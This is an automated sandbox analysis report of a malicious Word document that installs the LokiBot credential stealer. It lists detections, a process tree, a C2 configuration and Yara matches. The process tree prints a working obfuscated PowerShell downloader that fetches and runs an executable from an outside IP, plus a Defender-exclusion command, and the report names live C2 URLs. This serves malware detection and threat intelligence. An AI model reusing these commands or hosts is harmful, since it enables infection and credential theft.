Edit tour

Windows Analysis Report
PO-000041492.docx.doc

Overview

General Information

Sample name:	PO-000041492.docx.doc
Analysis ID:	1559210
MD5:	78be86ebe4907d4195a9f9b7b09d9454
SHA1:	1136319ab7cb1b7b50ea3c93a8fd25c402c7f971
SHA256:	36121afec9959963b1c1d30dcb13b9031e445cebac5a62b353297c94bb3c2f75
Tags:	docuser-lowmal3
Infos:

Detection

Lokibot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Microsoft Office launches external ms-search protocol handler (WebDAV)

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Suricata IDS alerts for network traffic

Yara detected Lokibot

.NET source code contains potential unpacker

Adds a directory exclusion to Windows Defender

C2 URLs / IPs found in malware configuration

Contains an external reference to another file

Document exploit detected (process start blacklist hit)

Drops PE files with benign system names

Injects a PE file into a foreign processes

Installs new ROOT certificates

Machine Learning detection for dropped file

Microsoft Office drops suspicious files

Office drops RTF file

Office equation editor establishes network connection

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Office viewer loads remote template

PowerShell case anomaly found

Powershell drops PE file

Shellcode detected

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: Equation Editor Network Connection

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Suspicious MSHTA Child Process

Sigma detected: Suspicious Microsoft Office Child Process

Sigma detected: Suspicious PowerShell Parameter Substring

Sigma detected: System File Execution Location Anomaly

Suspicious powershell command line found

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Tries to steal Mail credentials (via file registry)

Yara detected aPLib compressed binary

Allocates memory with a write watch (potentially for evading sandboxes)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Compiles C# or VB.Net code

Contains functionality to download and execute PE files

Contains functionality to download and launch executables

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected potential crypto function

Document misses a certain OLE stream usually present in this Microsoft Office document type

Downloads executable code via HTTP

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Office Equation Editor has been started

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Searches for the Microsoft Outlook file path

Searches the installation path of Mozilla Firefox

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Office Outbound Connections

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w7x64

WINWORD.EXE (PID: 3292 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)

EQNEDT32.EXE (PID: 3752 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

mshta.exe (PID: 3820 cmdline: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\AppData\Roaming\goodtoseeuthatgreatthingswithentirethingsgreatf.hta" MD5: ABDFC692D9FE43E2BA8FE6CB5A8CB95A)

powershell.exe (PID: 3876 cmdline: "C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly82Ni42My4xODcuMjMxLzMzL2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLDAsMCk7U1RBUlQtU2xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3aW5pbml0LmV4ZSI='+[CHAR]0x22+'))')))" MD5: EB32C070E658937AA9FA9F3AE629B2B8)

powershell.exe (PID: 4016 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt MD5: EB32C070E658937AA9FA9F3AE629B2B8)

csc.exe (PID: 1908 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b2mggwzy\b2mggwzy.cmdline" MD5: F8F36858B9405FBE27377FD7E8FEC2F2)

cvtres.exe (PID: 2960 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES950F.tmp" "c:\Users\user\AppData\Local\Temp\b2mggwzy\CSC80BAF758EA8A4749878CF9DF238E437.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)

wininit.exe (PID: 2092 cmdline: "C:\Users\user\AppData\Roaming\wininit.exe" MD5: 66B03D1AFF27D81E62B53FC108806211)

powershell.exe (PID: 2164 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wininit.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)

wininit.exe (PID: 772 cmdline: "C:\Users\user\AppData\Roaming\wininit.exe" MD5: 66B03D1AFF27D81E62B53FC108806211)

verclsid.exe (PID: 2212 cmdline: "C:\Windows\system32\verclsid.exe" /S /C {00020830-0000-0000-C000-000000000046} /I {00000112-0000-0000-C000-000000000046} /X 0x5 MD5: 3796AE13F680D9239210513EDA590E86)

EXCEL.EXE (PID: 2832 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)

EXCEL.EXE (PID: 3280 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Loki Password Stealer (PWS), LokiBot	"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2	SWEED The Gorgon Group Cobalt	http://blog.reversing.xyz/reversing/2021/06/08/lokibot.html http://reversing.fun/posts/2021/06/08/lokibot.html http://reversing.fun/reversing/2021/06/08/lokibot.html http://www.malware-traffic-analysis.net/2017/06/12/index.html https://blog.fortinet.com/2017/05/17/new-loki-variant-being-spread-via-pdf-file	https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "94.156.177.41/maxzi/five/fre.php"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\18F2865F.doc	INDICATOR_RTF_MalVer_Objects	Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.	ditekSHen	0x154b:$obj1: \objhtml 0x1588:$obj2: \objdata 0x1570:$obj3: \objupdate
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seemybestoptionforentiretimegivenmebackwith______suchagreatthignswithentiretimewithmegood______seethebestthignsalwaysgivnebestthigns[1].doc	INDICATOR_RTF_MalVer_Objects	Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.	ditekSHen	0x154b:$obj1: \objhtml 0x1588:$obj2: \objdata 0x1570:$obj3: \objupdate

Memory Dumps

Source	Rule	Description	Author	Strings
00000010.00000002.422492450.00000000020E1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000010.00000002.422492450.00000000020E1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000010.00000002.422492450.00000000020E1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000010.00000002.422492450.00000000020E1000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x21b60:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000010.00000002.422492450.00000000020E1000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0xef13:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000010.00000002.422492450.00000000020E1000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x1d757:$des3: 68 03 66 00 00 0x21b60:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x21c2c:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000010.00000002.422950577.0000000003288000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000010.00000002.422950577.0000000003288000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000010.00000002.422950577.0000000003288000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000010.00000002.422950577.0000000003288000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x181d0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000010.00000002.422950577.0000000003288000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x559b:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000010.00000002.422950577.0000000003288000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13ddf:$des3: 68 03 66 00 00 0x181d0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x1829c:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000012.00000002.654667913.0000000000534000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
00000010.00000002.422950577.00000000030E1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000010.00000002.422950577.00000000030E1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000010.00000002.422950577.00000000030E1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000010.00000002.422950577.00000000030E1000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x1a51b0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000010.00000002.422950577.00000000030E1000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x19257b:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000010.00000002.422950577.00000000030E1000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x1a0dbf:$des3: 68 03 66 00 00 0x1a51b0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x1a527c:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
Process Memory Space: wininit.exe PID: 2092	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: wininit.exe PID: 2092	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: wininit.exe PID: 2092	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x4518a:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0x5a436:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0x5e3ee:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: wininit.exe PID: 772	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: wininit.exe PID: 772	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: wininit.exe PID: 772	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
Process Memory Space: wininit.exe PID: 772	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x8a3a:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Click to see the 29 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
16.2.wininit.exe.326edc0.5.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
16.2.wininit.exe.326edc0.5.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
16.2.wininit.exe.326edc0.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
16.2.wininit.exe.326edc0.5.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
16.2.wininit.exe.326edc0.5.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
16.2.wininit.exe.326edc0.5.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
16.2.wininit.exe.326edc0.5.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
16.2.wininit.exe.326edc0.5.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
16.2.wininit.exe.326edc0.5.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
16.2.wininit.exe.326edc0.5.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
16.2.wininit.exe.326edc0.5.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
16.2.wininit.exe.326edc0.5.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
16.2.wininit.exe.326edc0.5.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
18.2.wininit.exe.400000.0.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
18.2.wininit.exe.400000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
18.2.wininit.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
18.2.wininit.exe.400000.0.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
18.2.wininit.exe.400000.0.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
18.2.wininit.exe.400000.0.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
18.2.wininit.exe.400000.0.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
18.2.wininit.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
16.2.wininit.exe.3288de0.4.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
16.2.wininit.exe.3288de0.4.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
16.2.wininit.exe.3288de0.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
16.2.wininit.exe.3288de0.4.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
16.2.wininit.exe.3288de0.4.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
16.2.wininit.exe.3288de0.4.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
16.2.wininit.exe.3288de0.4.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
16.2.wininit.exe.3288de0.4.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
18.2.wininit.exe.400000.0.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
18.2.wininit.exe.400000.0.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
18.2.wininit.exe.400000.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
18.2.wininit.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
18.2.wininit.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
18.2.wininit.exe.400000.0.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
18.2.wininit.exe.400000.0.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
